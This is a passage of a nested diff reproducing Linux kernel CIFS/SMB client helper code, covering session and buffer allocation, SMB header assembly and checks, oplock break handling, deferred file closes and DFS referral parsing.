+-		mutex_init(&ret_buf->session_mutex);
+-		spin_lock_init(&ret_buf->iface_lock);
+-		INIT_LIST_HEAD(&ret_buf->iface_list);
+-		spin_lock_init(&ret_buf->chan_lock);
+-	}
+-	return ret_buf;
+-}
+-
+-void
+-sesInfoFree(struct cifs_ses *buf_to_free)
+-{
+-	struct cifs_server_iface *iface = NULL, *niface = NULL;
+-
+-	if (buf_to_free == NULL) {
+-		cifs_dbg(FYI, "Null buffer passed to sesInfoFree\n");
+-		return;
+-	}
+-
+-	atomic_dec(&sesInfoAllocCount);
+-	kfree(buf_to_free->serverOS);
+-	kfree(buf_to_free->serverDomain);
+-	kfree(buf_to_free->serverNOS);
+-	kfree_sensitive(buf_to_free->password);
+-	kfree(buf_to_free->user_name);
+-	kfree(buf_to_free->domainName);
+-	kfree_sensitive(buf_to_free->auth_key.response);
+-	spin_lock(&buf_to_free->iface_lock);
+-	list_for_each_entry_safe(iface, niface, &buf_to_free->iface_list,
+-				 iface_head)
+-		kref_put(&iface->refcount, release_iface);
+-	spin_unlock(&buf_to_free->iface_lock);
+-	kfree_sensitive(buf_to_free);
+-}
+-
+-struct cifs_tcon *
+-tconInfoAlloc(void)
+-{
+-	struct cifs_tcon *ret_buf;
+-
+-	ret_buf = kzalloc(sizeof(*ret_buf), GFP_KERNEL);
+-	if (!ret_buf)
+-		return NULL;
+-	ret_buf->cfids = init_cached_dirs();
+-	if (!ret_buf->cfids) {
+-		kfree(ret_buf);
+-		return NULL;
+-	}
+-
+-	atomic_inc(&tconInfoAllocCount);
+-	ret_buf->status = TID_NEW;
+-	++ret_buf->tc_count;
+-	spin_lock_init(&ret_buf->tc_lock);
+-	INIT_LIST_HEAD(&ret_buf->openFileList);
+-	INIT_LIST_HEAD(&ret_buf->tcon_list);
+-	spin_lock_init(&ret_buf->open_file_lock);
+-	spin_lock_init(&ret_buf->stat_lock);
+-	atomic_set(&ret_buf->num_local_opens, 0);
+-	atomic_set(&ret_buf->num_remote_opens, 0);
+-
+-	return ret_buf;
+-}
+-
+-void
+-tconInfoFree(struct cifs_tcon *tcon)
+-{
+-	if (tcon == NULL) {
+-		cifs_dbg(FYI, "Null buffer passed to tconInfoFree\n");
+-		return;
+-	}
+-	free_cached_dirs(tcon->cfids);
+-	atomic_dec(&tconInfoAllocCount);
+-	kfree(tcon->nativeFileSystem);
+-	kfree_sensitive(tcon->password);
+-	kfree(tcon);
+-}
+-
+-struct smb_hdr *
+-cifs_buf_get(void)
+-{
+-	struct smb_hdr *ret_buf = NULL;
+-	/*
+-	 * SMB2 header is bigger than CIFS one - no problems to clean some
+-	 * more bytes for CIFS.
+-	 */
+-	size_t buf_size = sizeof(struct smb2_hdr);
+-
+-	/*
+-	 * We could use negotiated size instead of max_msgsize -
+-	 * but it may be more efficient to always alloc same size
+-	 * albeit slightly larger than necessary and maxbuffersize
+-	 * defaults to this and can not be bigger.
+-	 */
+-	ret_buf = mempool_alloc(cifs_req_poolp, GFP_NOFS);
+-
+-	/* clear the first few header bytes */
+-	/* for most paths, more is cleared in header_assemble */
+-	memset(ret_buf, 0, buf_size + 3);
+-	atomic_inc(&buf_alloc_count);
+-#ifdef CONFIG_CIFS_STATS2
+-	atomic_inc(&total_buf_alloc_count);
+-#endif /* CONFIG_CIFS_STATS2 */
+-
+-	return ret_buf;
+-}
+-
+-void
+-cifs_buf_release(void *buf_to_free)
+-{
+-	if (buf_to_free == NULL) {
+-		/* cifs_dbg(FYI, "Null buffer passed to cifs_buf_release\n");*/
+-		return;
+-	}
+-	mempool_free(buf_to_free, cifs_req_poolp);
+-
+-	atomic_dec(&buf_alloc_count);
+-	return;
+-}
+-
+-struct smb_hdr *
+-cifs_small_buf_get(void)
+-{
+-	struct smb_hdr *ret_buf = NULL;
+-
+-/* We could use negotiated size instead of max_msgsize -
+-   but it may be more efficient to always alloc same size
+-   albeit slightly larger than necessary and maxbuffersize
+-   defaults to this and can not be bigger */
+-	ret_buf = mempool_alloc(cifs_sm_req_poolp, GFP_NOFS);
+-	/* No need to clear memory here, cleared in header assemble */
+-	/*	memset(ret_buf, 0, sizeof(struct smb_hdr) + 27);*/
+-	atomic_inc(&small_buf_alloc_count);
+-#ifdef CONFIG_CIFS_STATS2
+-	atomic_inc(&total_small_buf_alloc_count);
+-#endif /* CONFIG_CIFS_STATS2 */
+-
+-	return ret_buf;
+-}
+-
+-void
+-cifs_small_buf_release(void *buf_to_free)
+-{
+-
+-	if (buf_to_free == NULL) {
+-		cifs_dbg(FYI, "Null buffer passed to cifs_small_buf_release\n");
+-		return;
+-	}
+-	mempool_free(buf_to_free, cifs_sm_req_poolp);
+-
+-	atomic_dec(&small_buf_alloc_count);
+-	return;
+-}
+-
+-void
+-free_rsp_buf(int resp_buftype, void *rsp)
+-{
+-	if (resp_buftype == CIFS_SMALL_BUFFER)
+-		cifs_small_buf_release(rsp);
+-	else if (resp_buftype == CIFS_LARGE_BUFFER)
+-		cifs_buf_release(rsp);
+-}
+-
+-/* NB: MID can not be set if treeCon not passed in, in that
+-   case it is responsbility of caller to set the mid */
+-void
+-header_assemble(struct smb_hdr *buffer, char smb_command /* command */ ,
+-		const struct cifs_tcon *treeCon, int word_count
+-		/* length of fixed section (word count) in two byte units  */)
+-{
+-	char *temp = (char *) buffer;
+-
+-	memset(temp, 0, 256); /* bigger than MAX_CIFS_HDR_SIZE */
+-
+-	buffer->smb_buf_length = cpu_to_be32(
+-	    (2 * word_count) + sizeof(struct smb_hdr) -
+-	    4 /*  RFC 1001 length field does not count */  +
+-	    2 /* for bcc field itself */) ;
+-
+-	buffer->Protocol[0] = 0xFF;
+-	buffer->Protocol[1] = 'S';
+-	buffer->Protocol[2] = 'M';
+-	buffer->Protocol[3] = 'B';
+-	buffer->Command = smb_command;
+-	buffer->Flags = 0x00;	/* case sensitive */
+-	buffer->Flags2 = SMBFLG2_KNOWS_LONG_NAMES;
+-	buffer->Pid = cpu_to_le16((__u16)current->tgid);
+-	buffer->PidHigh = cpu_to_le16((__u16)(current->tgid >> 16));
+-	if (treeCon) {
+-		buffer->Tid = treeCon->tid;
+-		if (treeCon->ses) {
+-			if (treeCon->ses->capabilities & CAP_UNICODE)
+-				buffer->Flags2 |= SMBFLG2_UNICODE;
+-			if (treeCon->ses->capabilities & CAP_STATUS32)
+-				buffer->Flags2 |= SMBFLG2_ERR_STATUS;
+-
+-			/* Uid is not converted */
+-			buffer->Uid = treeCon->ses->Suid;
+-			if (treeCon->ses->server)
+-				buffer->Mid = get_next_mid(treeCon->ses->server);
+-		}
+-		if (treeCon->Flags & SMB_SHARE_IS_IN_DFS)
+-			buffer->Flags2 |= SMBFLG2_DFS;
+-		if (treeCon->nocase)
+-			buffer->Flags  |= SMBFLG_CASELESS;
+-		if ((treeCon->ses) && (treeCon->ses->server))
+-			if (treeCon->ses->server->sign)
+-				buffer->Flags2 |= SMBFLG2_SECURITY_SIGNATURE;
+-	}
+-
+-/*  endian conversion of flags is now done just before sending */
+-	buffer->WordCount = (char) word_count;
+-	return;
+-}
+-
+-static int
+-check_smb_hdr(struct smb_hdr *smb)
+-{
+-	/* does it have the right SMB "signature" ? */
+-	if (*(__le32 *) smb->Protocol != cpu_to_le32(0x424d53ff)) {
+-		cifs_dbg(VFS, "Bad protocol string signature header 0x%x\n",
+-			 *(unsigned int *)smb->Protocol);
+-		return 1;
+-	}
+-
+-	/* if it's a response then accept */
+-	if (smb->Flags & SMBFLG_RESPONSE)
+-		return 0;
+-
+-	/* only one valid case where server sends us request */
+-	if (smb->Command == SMB_COM_LOCKING_ANDX)
+-		return 0;
+-
+-	cifs_dbg(VFS, "Server sent request, not response. mid=%u\n",
+-		 get_mid(smb));
+-	return 1;
+-}
+-
+-int
+-checkSMB(char *buf, unsigned int total_read, struct TCP_Server_Info *server)
+-{
+-	struct smb_hdr *smb = (struct smb_hdr *)buf;
+-	__u32 rfclen = be32_to_cpu(smb->smb_buf_length);
+-	__u32 clc_len;  /* calculated length */
+-	cifs_dbg(FYI, "checkSMB Length: 0x%x, smb_buf_length: 0x%x\n",
+-		 total_read, rfclen);
+-
+-	/* is this frame too small to even get to a BCC? */
+-	if (total_read < 2 + sizeof(struct smb_hdr)) {
+-		if ((total_read >= sizeof(struct smb_hdr) - 1)
+-			    && (smb->Status.CifsError != 0)) {
+-			/* it's an error return */
+-			smb->WordCount = 0;
+-			/* some error cases do not return wct and bcc */
+-			return 0;
+-		} else if ((total_read == sizeof(struct smb_hdr) + 1) &&
+-				(smb->WordCount == 0)) {
+-			char *tmp = (char *)smb;
+-			/* Need to work around a bug in two servers here */
+-			/* First, check if the part of bcc they sent was zero */
+-			if (tmp[sizeof(struct smb_hdr)] == 0) {
+-				/* some servers return only half of bcc
+-				 * on simple responses (wct, bcc both zero)
+-				 * in particular have seen this on
+-				 * ulogoffX and FindClose. This leaves
+-				 * one byte of bcc potentially unitialized
+-				 */
+-				/* zero rest of bcc */
+-				tmp[sizeof(struct smb_hdr)+1] = 0;
+-				return 0;
+-			}
+-			cifs_dbg(VFS, "rcvd invalid byte count (bcc)\n");
+-		} else {
+-			cifs_dbg(VFS, "Length less than smb header size\n");
+-		}
+-		return -EIO;
+-	}
+-
+-	/* otherwise, there is enough to get to the BCC */
+-	if (check_smb_hdr(smb))
+-		return -EIO;
+-	clc_len = smbCalcSize(smb);
+-
+-	if (4 + rfclen != total_read) {
+-		cifs_dbg(VFS, "Length read does not match RFC1001 length %d\n",
+-			 rfclen);
+-		return -EIO;
+-	}
+-
+-	if (4 + rfclen != clc_len) {
+-		__u16 mid = get_mid(smb);
+-		/* check if bcc wrapped around for large read responses */
+-		if ((rfclen > 64 * 1024) && (rfclen > clc_len)) {
+-			/* check if lengths match mod 64K */
+-			if (((4 + rfclen) & 0xFFFF) == (clc_len & 0xFFFF))
+-				return 0; /* bcc wrapped */
+-		}
+-		cifs_dbg(FYI, "Calculated size %u vs length %u mismatch for mid=%u\n",
+-			 clc_len, 4 + rfclen, mid);
+-
+-		if (4 + rfclen < clc_len) {
+-			cifs_dbg(VFS, "RFC1001 size %u smaller than SMB for mid=%u\n",
+-				 rfclen, mid);
+-			return -EIO;
+-		} else if (rfclen > clc_len + 512) {
+-			/*
+-			 * Some servers (Windows XP in particular) send more
+-			 * data than the lengths in the SMB packet would
+-			 * indicate on certain calls (byte range locks and
+-			 * trans2 find first calls in particular). While the
+-			 * client can handle such a frame by ignoring the
+-			 * trailing data, we choose limit the amount of extra
+-			 * data to 512 bytes.
+-			 */
+-			cifs_dbg(VFS, "RFC1001 size %u more than 512 bytes larger than SMB for mid=%u\n",
+-				 rfclen, mid);
+-			return -EIO;
+-		}
+-	}
+-	return 0;
+-}
+-
+-bool
+-is_valid_oplock_break(char *buffer, struct TCP_Server_Info *srv)
+-{
+-	struct smb_hdr *buf = (struct smb_hdr *)buffer;
+-	struct smb_com_lock_req *pSMB = (struct smb_com_lock_req *)buf;
+-	struct TCP_Server_Info *pserver;
+-	struct cifs_ses *ses;
+-	struct cifs_tcon *tcon;
+-	struct cifsInodeInfo *pCifsInode;
+-	struct cifsFileInfo *netfile;
+-
+-	cifs_dbg(FYI, "Checking for oplock break or dnotify response\n");
+-	if ((pSMB->hdr.Command == SMB_COM_NT_TRANSACT) &&
+-	   (pSMB->hdr.Flags & SMBFLG_RESPONSE)) {
+-		struct smb_com_transaction_change_notify_rsp *pSMBr =
+-			(struct smb_com_transaction_change_notify_rsp *)buf;
+-		struct file_notify_information *pnotify;
+-		__u32 data_offset = 0;
+-		size_t len = srv->total_read - sizeof(pSMBr->hdr.smb_buf_length);
+-
+-		if (get_bcc(buf) > sizeof(struct file_notify_information)) {
+-			data_offset = le32_to_cpu(pSMBr->DataOffset);
+-
+-			if (data_offset >
+-			    len - sizeof(struct file_notify_information)) {
+-				cifs_dbg(FYI, "Invalid data_offset %u\n",
+-					 data_offset);
+-				return true;
+-			}
+-			pnotify = (struct file_notify_information *)
+-				((char *)&pSMBr->hdr.Protocol + data_offset);
+-			cifs_dbg(FYI, "dnotify on %s Action: 0x%x\n",
+-				 pnotify->FileName, pnotify->Action);
+-			/*   cifs_dump_mem("Rcvd notify Data: ",buf,
+-				sizeof(struct smb_hdr)+60); */
+-			return true;
+-		}
+-		if (pSMBr->hdr.Status.CifsError) {
+-			cifs_dbg(FYI, "notify err 0x%x\n",
+-				 pSMBr->hdr.Status.CifsError);
+-			return true;
+-		}
+-		return false;
+-	}
+-	if (pSMB->hdr.Command != SMB_COM_LOCKING_ANDX)
+-		return false;
+-	if (pSMB->hdr.Flags & SMBFLG_RESPONSE) {
+-		/* no sense logging error on invalid handle on oplock
+-		   break - harmless race between close request and oplock
+-		   break response is expected from time to time writing out
+-		   large dirty files cached on the client */
+-		if ((NT_STATUS_INVALID_HANDLE) ==
+-		   le32_to_cpu(pSMB->hdr.Status.CifsError)) {
+-			cifs_dbg(FYI, "Invalid handle on oplock break\n");
+-			return true;
+-		} else if (ERRbadfid ==
+-		   le16_to_cpu(pSMB->hdr.Status.DosError.Error)) {
+-			return true;
+-		} else {
+-			return false; /* on valid oplock brk we get "request" */
+-		}
+-	}
+-	if (pSMB->hdr.WordCount != 8)
+-		return false;
+-
+-	cifs_dbg(FYI, "oplock type 0x%x level 0x%x\n",
+-		 pSMB->LockType, pSMB->OplockLevel);
+-	if (!(pSMB->LockType & LOCKING_ANDX_OPLOCK_RELEASE))
+-		return false;
+-
+-	/* If server is a channel, select the primary channel */
+-	pserver = CIFS_SERVER_IS_CHAN(srv) ? srv->primary_server : srv;
+-
+-	/* look up tcon based on tid & uid */
+-	spin_lock(&cifs_tcp_ses_lock);
+-	list_for_each_entry(ses, &pserver->smb_ses_list, smb_ses_list) {
+-		list_for_each_entry(tcon, &ses->tcon_list, tcon_list) {
+-			if (tcon->tid != buf->Tid)
+-				continue;
+-
+-			cifs_stats_inc(&tcon->stats.cifs_stats.num_oplock_brks);
+-			spin_lock(&tcon->open_file_lock);
+-			list_for_each_entry(netfile, &tcon->openFileList, tlist) {
+-				if (pSMB->Fid != netfile->fid.netfid)
+-					continue;
+-
+-				cifs_dbg(FYI, "file id match, oplock break\n");
+-				pCifsInode = CIFS_I(d_inode(netfile->dentry));
+-
+-				set_bit(CIFS_INODE_PENDING_OPLOCK_BREAK,
+-					&pCifsInode->flags);
+-
+-				netfile->oplock_epoch = 0;
+-				netfile->oplock_level = pSMB->OplockLevel;
+-				netfile->oplock_break_cancelled = false;
+-				cifs_queue_oplock_break(netfile);
+-
+-				spin_unlock(&tcon->open_file_lock);
+-				spin_unlock(&cifs_tcp_ses_lock);
+-				return true;
+-			}
+-			spin_unlock(&tcon->open_file_lock);
+-			spin_unlock(&cifs_tcp_ses_lock);
+-			cifs_dbg(FYI, "No matching file for oplock break\n");
+-			return true;
+-		}
+-	}
+-	spin_unlock(&cifs_tcp_ses_lock);
+-	cifs_dbg(FYI, "Can not process oplock break for non-existent connection\n");
+-	return true;
+-}
+-
+-void
+-dump_smb(void *buf, int smb_buf_length)
+-{
+-	if (traceSMB == 0)
+-		return;
+-
+-	print_hex_dump(KERN_DEBUG, "", DUMP_PREFIX_NONE, 8, 2, buf,
+-		       smb_buf_length, true);
+-}
+-
+-void
+-cifs_autodisable_serverino(struct cifs_sb_info *cifs_sb)
+-{
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SERVER_INUM) {
+-		struct cifs_tcon *tcon = NULL;
+-
+-		if (cifs_sb->master_tlink)
+-			tcon = cifs_sb_master_tcon(cifs_sb);
+-
+-		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_SERVER_INUM;
+-		cifs_sb->mnt_cifs_serverino_autodisabled = true;
+-		cifs_dbg(VFS, "Autodisabling the use of server inode numbers on %s\n",
+-			 tcon ? tcon->tree_name : "new server");
+-		cifs_dbg(VFS, "The server doesn't seem to support them properly or the files might be on different servers (DFS)\n");
+-		cifs_dbg(VFS, "Hardlinks will not be recognized on this mount. Consider mounting with the \"noserverino\" option to silence this message.\n");
+-
+-	}
+-}
+-
+-void cifs_set_oplock_level(struct cifsInodeInfo *cinode, __u32 oplock)
+-{
+-	oplock &= 0xF;
+-
+-	if (oplock == OPLOCK_EXCLUSIVE) {
+-		cinode->oplock = CIFS_CACHE_WRITE_FLG | CIFS_CACHE_READ_FLG;
+-		cifs_dbg(FYI, "Exclusive Oplock granted on inode %p\n",
+-			 &cinode->netfs.inode);
+-	} else if (oplock == OPLOCK_READ) {
+-		cinode->oplock = CIFS_CACHE_READ_FLG;
+-		cifs_dbg(FYI, "Level II Oplock granted on inode %p\n",
+-			 &cinode->netfs.inode);
+-	} else
+-		cinode->oplock = 0;
+-}
+-
+-/*
+- * We wait for oplock breaks to be processed before we attempt to perform
+- * writes.
+- */
+-int cifs_get_writer(struct cifsInodeInfo *cinode)
+-{
+-	int rc;
+-
+-start:
+-	rc = wait_on_bit(&cinode->flags, CIFS_INODE_PENDING_OPLOCK_BREAK,
+-			 TASK_KILLABLE);
+-	if (rc)
+-		return rc;
+-
+-	spin_lock(&cinode->writers_lock);
+-	if (!cinode->writers)
+-		set_bit(CIFS_INODE_PENDING_WRITERS, &cinode->flags);
+-	cinode->writers++;
+-	/* Check to see if we have started servicing an oplock break */
+-	if (test_bit(CIFS_INODE_PENDING_OPLOCK_BREAK, &cinode->flags)) {
+-		cinode->writers--;
+-		if (cinode->writers == 0) {
+-			clear_bit(CIFS_INODE_PENDING_WRITERS, &cinode->flags);
+-			wake_up_bit(&cinode->flags, CIFS_INODE_PENDING_WRITERS);
+-		}
+-		spin_unlock(&cinode->writers_lock);
+-		goto start;
+-	}
+-	spin_unlock(&cinode->writers_lock);
+-	return 0;
+-}
+-
+-void cifs_put_writer(struct cifsInodeInfo *cinode)
+-{
+-	spin_lock(&cinode->writers_lock);
+-	cinode->writers--;
+-	if (cinode->writers == 0) {
+-		clear_bit(CIFS_INODE_PENDING_WRITERS, &cinode->flags);
+-		wake_up_bit(&cinode->flags, CIFS_INODE_PENDING_WRITERS);
+-	}
+-	spin_unlock(&cinode->writers_lock);
+-}
+-
+-/**
+- * cifs_queue_oplock_break - queue the oplock break handler for cfile
+- * @cfile: The file to break the oplock on
+- *
+- * This function is called from the demultiplex thread when it
+- * receives an oplock break for @cfile.
+- *
+- * Assumes the tcon->open_file_lock is held.
+- * Assumes cfile->file_info_lock is NOT held.
+- */
+-void cifs_queue_oplock_break(struct cifsFileInfo *cfile)
+-{
+-	/*
+-	 * Bump the handle refcount now while we hold the
+-	 * open_file_lock to enforce the validity of it for the oplock
+-	 * break handler. The matching put is done at the end of the
+-	 * handler.
+-	 */
+-	cifsFileInfo_get(cfile);
+-
+-	queue_work(cifsoplockd_wq, &cfile->oplock_break);
+-}
+-
+-void cifs_done_oplock_break(struct cifsInodeInfo *cinode)
+-{
+-	clear_bit(CIFS_INODE_PENDING_OPLOCK_BREAK, &cinode->flags);
+-	wake_up_bit(&cinode->flags, CIFS_INODE_PENDING_OPLOCK_BREAK);
+-}
+-
+-bool
+-backup_cred(struct cifs_sb_info *cifs_sb)
+-{
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_CIFS_BACKUPUID) {
+-		if (uid_eq(cifs_sb->ctx->backupuid, current_fsuid()))
+-			return true;
+-	}
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_CIFS_BACKUPGID) {
+-		if (in_group_p(cifs_sb->ctx->backupgid))
+-			return true;
+-	}
+-
+-	return false;
+-}
+-
+-void
+-cifs_del_pending_open(struct cifs_pending_open *open)
+-{
+-	spin_lock(&tlink_tcon(open->tlink)->open_file_lock);
+-	list_del(&open->olist);
+-	spin_unlock(&tlink_tcon(open->tlink)->open_file_lock);
+-}
+-
+-void
+-cifs_add_pending_open_locked(struct cifs_fid *fid, struct tcon_link *tlink,
+-			     struct cifs_pending_open *open)
+-{
+-	memcpy(open->lease_key, fid->lease_key, SMB2_LEASE_KEY_SIZE);
+-	open->oplock = CIFS_OPLOCK_NO_CHANGE;
+-	open->tlink = tlink;
+-	fid->pending_open = open;
+-	list_add_tail(&open->olist, &tlink_tcon(tlink)->pending_opens);
+-}
+-
+-void
+-cifs_add_pending_open(struct cifs_fid *fid, struct tcon_link *tlink,
+-		      struct cifs_pending_open *open)
+-{
+-	spin_lock(&tlink_tcon(tlink)->open_file_lock);
+-	cifs_add_pending_open_locked(fid, tlink, open);
+-	spin_unlock(&tlink_tcon(open->tlink)->open_file_lock);
+-}
+-
+-/*
+- * Critical section which runs after acquiring deferred_lock.
+- * As there is no reference count on cifs_deferred_close, pdclose
+- * should not be used outside deferred_lock.
+- */
+-bool
+-cifs_is_deferred_close(struct cifsFileInfo *cfile, struct cifs_deferred_close **pdclose)
+-{
+-	struct cifs_deferred_close *dclose;
+-
+-	list_for_each_entry(dclose, &CIFS_I(d_inode(cfile->dentry))->deferred_closes, dlist) {
+-		if ((dclose->netfid == cfile->fid.netfid) &&
+-			(dclose->persistent_fid == cfile->fid.persistent_fid) &&
+-			(dclose->volatile_fid == cfile->fid.volatile_fid)) {
+-			*pdclose = dclose;
+-			return true;
+-		}
+-	}
+-	return false;
+-}
+-
+-/*
+- * Critical section which runs after acquiring deferred_lock.
+- */
+-void
+-cifs_add_deferred_close(struct cifsFileInfo *cfile, struct cifs_deferred_close *dclose)
+-{
+-	bool is_deferred = false;
+-	struct cifs_deferred_close *pdclose;
+-
+-	is_deferred = cifs_is_deferred_close(cfile, &pdclose);
+-	if (is_deferred) {
+-		kfree(dclose);
+-		return;
+-	}
+-
+-	dclose->tlink = cfile->tlink;
+-	dclose->netfid = cfile->fid.netfid;
+-	dclose->persistent_fid = cfile->fid.persistent_fid;
+-	dclose->volatile_fid = cfile->fid.volatile_fid;
+-	list_add_tail(&dclose->dlist, &CIFS_I(d_inode(cfile->dentry))->deferred_closes);
+-}
+-
+-/*
+- * Critical section which runs after acquiring deferred_lock.
+- */
+-void
+-cifs_del_deferred_close(struct cifsFileInfo *cfile)
+-{
+-	bool is_deferred = false;
+-	struct cifs_deferred_close *dclose;
+-
+-	is_deferred = cifs_is_deferred_close(cfile, &dclose);
+-	if (!is_deferred)
+-		return;
+-	list_del(&dclose->dlist);
+-	kfree(dclose);
+-}
+-
+-void
+-cifs_close_deferred_file(struct cifsInodeInfo *cifs_inode)
+-{
+-	struct cifsFileInfo *cfile = NULL;
+-	struct file_list *tmp_list, *tmp_next_list;
+-	struct list_head file_head;
+-
+-	if (cifs_inode == NULL)
+-		return;
+-
+-	INIT_LIST_HEAD(&file_head);
+-	spin_lock(&cifs_inode->open_file_lock);
+-	list_for_each_entry(cfile, &cifs_inode->openFileList, flist) {
+-		if (delayed_work_pending(&cfile->deferred)) {
+-			if (cancel_delayed_work(&cfile->deferred)) {
+-				spin_lock(&cifs_inode->deferred_lock);
+-				cifs_del_deferred_close(cfile);
+-				spin_unlock(&cifs_inode->deferred_lock);
+-
+-				tmp_list = kmalloc(sizeof(struct file_list), GFP_ATOMIC);
+-				if (tmp_list == NULL)
+-					break;
+-				tmp_list->cfile = cfile;
+-				list_add_tail(&tmp_list->list, &file_head);
+-			}
+-		}
+-	}
+-	spin_unlock(&cifs_inode->open_file_lock);
+-
+-	list_for_each_entry_safe(tmp_list, tmp_next_list, &file_head, list) {
+-		_cifsFileInfo_put(tmp_list->cfile, false, false);
+-		list_del(&tmp_list->list);
+-		kfree(tmp_list);
+-	}
+-}
+-
+-void
+-cifs_close_all_deferred_files(struct cifs_tcon *tcon)
+-{
+-	struct cifsFileInfo *cfile;
+-	struct file_list *tmp_list, *tmp_next_list;
+-	struct list_head file_head;
+-
+-	INIT_LIST_HEAD(&file_head);
+-	spin_lock(&tcon->open_file_lock);
+-	list_for_each_entry(cfile, &tcon->openFileList, tlist) {
+-		if (delayed_work_pending(&cfile->deferred)) {
+-			if (cancel_delayed_work(&cfile->deferred)) {
+-				spin_lock(&CIFS_I(d_inode(cfile->dentry))->deferred_lock);
+-				cifs_del_deferred_close(cfile);
+-				spin_unlock(&CIFS_I(d_inode(cfile->dentry))->deferred_lock);
+-
+-				tmp_list = kmalloc(sizeof(struct file_list), GFP_ATOMIC);
+-				if (tmp_list == NULL)
+-					break;
+-				tmp_list->cfile = cfile;
+-				list_add_tail(&tmp_list->list, &file_head);
+-			}
+-		}
+-	}
+-	spin_unlock(&tcon->open_file_lock);
+-
+-	list_for_each_entry_safe(tmp_list, tmp_next_list, &file_head, list) {
+-		_cifsFileInfo_put(tmp_list->cfile, true, false);
+-		list_del(&tmp_list->list);
+-		kfree(tmp_list);
+-	}
+-}
+-void
+-cifs_close_deferred_file_under_dentry(struct cifs_tcon *tcon, const char *path)
+-{
+-	struct cifsFileInfo *cfile;
+-	struct file_list *tmp_list, *tmp_next_list;
+-	struct list_head file_head;
+-	void *page;
+-	const char *full_path;
+-
+-	INIT_LIST_HEAD(&file_head);
+-	page = alloc_dentry_path();
+-	spin_lock(&tcon->open_file_lock);
+-	list_for_each_entry(cfile, &tcon->openFileList, tlist) {
+-		full_path = build_path_from_dentry(cfile->dentry, page);
+-		if (strstr(full_path, path)) {
+-			if (delayed_work_pending(&cfile->deferred)) {
+-				if (cancel_delayed_work(&cfile->deferred)) {
+-					spin_lock(&CIFS_I(d_inode(cfile->dentry))->deferred_lock);
+-					cifs_del_deferred_close(cfile);
+-					spin_unlock(&CIFS_I(d_inode(cfile->dentry))->deferred_lock);
+-
+-					tmp_list = kmalloc(sizeof(struct file_list), GFP_ATOMIC);
+-					if (tmp_list == NULL)
+-						break;
+-					tmp_list->cfile = cfile;
+-					list_add_tail(&tmp_list->list, &file_head);
+-				}
+-			}
+-		}
+-	}
+-	spin_unlock(&tcon->open_file_lock);
+-
+-	list_for_each_entry_safe(tmp_list, tmp_next_list, &file_head, list) {
+-		_cifsFileInfo_put(tmp_list->cfile, true, false);
+-		list_del(&tmp_list->list);
+-		kfree(tmp_list);
+-	}
+-	free_dentry_path(page);
+-}
+-
+-/* parses DFS referral V3 structure
+- * caller is responsible for freeing target_nodes
+- * returns:
+- * - on success - 0
+- * - on failure - errno
+- */
+-int
+-parse_dfs_referrals(struct get_dfs_referral_rsp *rsp, u32 rsp_size,
+-		    unsigned int *num_of_nodes,
+-		    struct dfs_info3_param **target_nodes,
+-		    const struct nls_table *nls_codepage, int remap,
+-		    const char *searchName, bool is_unicode)
+-{
+-	int i, rc = 0;
+-	char *data_end;
+-	struct dfs_referral_level_3 *ref;
+-
+-	*num_of_nodes = le16_to_cpu(rsp->NumberOfReferrals);
+-
+-	if (*num_of_nodes < 1) {
+-		cifs_dbg(VFS, "num_referrals: must be at least > 0, but we get num_referrals = %d\n",
+-			 *num_of_nodes);
+-		rc = -EINVAL;
+-		goto parse_DFS_referrals_exit;
+-	}
+-
+-	ref = (struct dfs_referral_level_3 *) &(rsp->referrals);
+-	if (ref->VersionNumber != cpu_to_le16(3)) {
+-		cifs_dbg(VFS, "Referrals of V%d version are not supported, should be V3\n",
+-			 le16_to_cpu(ref->VersionNumber));
+-		rc = -EINVAL;
+-		goto parse_DFS_referrals_exit;
+-	}
+-
+-	/* get the upper boundary of the resp buffer */
+-	data_end = (char *)rsp + rsp_size;
+-
+-	cifs_dbg(FYI, "num_referrals: %d dfs flags: 0x%x ...\n",
+-		 *num_of_nodes, le32_to_cpu(rsp->DFSFlags));
+-
+-	*target_nodes = kcalloc(*num_of_nodes, sizeof(struct dfs_info3_param),
+-				GFP_KERNEL);
+-	if (*target_nodes == NULL) {
+-		rc = -ENOMEM;
+-		goto parse_DFS_referrals_exit;
+-	}
+-
+-	/* collect necessary data from referrals */
+-	for (i = 0; i < *num_of_nodes; i++) {
+-		char *temp;
+-		int max_len;
+-		struct dfs_info3_param *node = (*target_nodes)+i;
+-
+-		node->flags = le32_to_cpu(rsp->DFSFlags);
+-		if (is_unicode) {
+-			__le16 *tmp = kmalloc(strlen(searchName)*2 + 2,
+-						GFP_KERNEL);
+-			if (tmp == NULL) {
+-				rc = -ENOMEM;
+-				goto parse_DFS_referrals_exit;
+-			}
+-			cifsConvertToUTF16((__le16 *) tmp, searchName,
+-					   PATH_MAX, nls_codepage, remap);
+-			node->path_consumed = cifs_utf16_bytes(tmp,
+-					le16_to_cpu(rsp->PathConsumed),
+-					nls_codepage);
+-			kfree(tmp);
+-		} else
+-			node->path_consumed = le16_to_cpu(rsp->PathConsumed);
+-
+-		node->server_type = le16_to_cpu(ref->ServerType);
+-		node->ref_flag = le16_to_cpu(ref->ReferralEntryFlags);
+-
+-		/* copy DfsPath */
+-		temp = (char *)ref + le16_to_cpu(ref->DfsPathOffset);
+-		max_len = data_end - temp;
+-		node->path_name = cifs_strndup_from_utf16(temp, max_len,
+-						is_unicode, nls_codepage);
+-		if (!node->path_name) {
+-			rc = -ENOMEM;
+-			goto parse_DFS_referrals_exit;
+-		}
+-
+-		/* copy link target UNC */
+-		temp = (char *)ref + le16_to_cpu(ref->NetworkAddressOffset);
+-		max_len = data_end - temp;
+-		node->node_name = cifs_strndup_from_utf16(temp, max_len,
+-						is_unicode, nls_codepage);
+-		if (!node->node_name) {
+-			rc = -ENOMEM;
+-			goto parse_DFS_referrals_exit;
+-		}
+-
+-		node->ttl = le32_to_cpu(ref->TimeToLive);
+-
+-		ref++;
+-	}
+-
+-parse_DFS_referrals_exit:
+-	if (rc) {
+-		free_dfs_info_array(*target_nodes, *num_of_nodes);
+-		*target_nodes = NULL;
+-		*num_of_nodes = 0;
+-	}
+-	return rc;
+-}
+-
+-struct cifs_aio_ctx *
+-cifs_aio_ctx_alloc(void)
+-{
+-	struct cifs_aio_ctx *ctx;
+-
+-	/*
+-	 * Must use kzalloc to initialize ctx->bv to NULL and ctx->direct_io
+-	 * to false so that we know when we have to unreference pages within
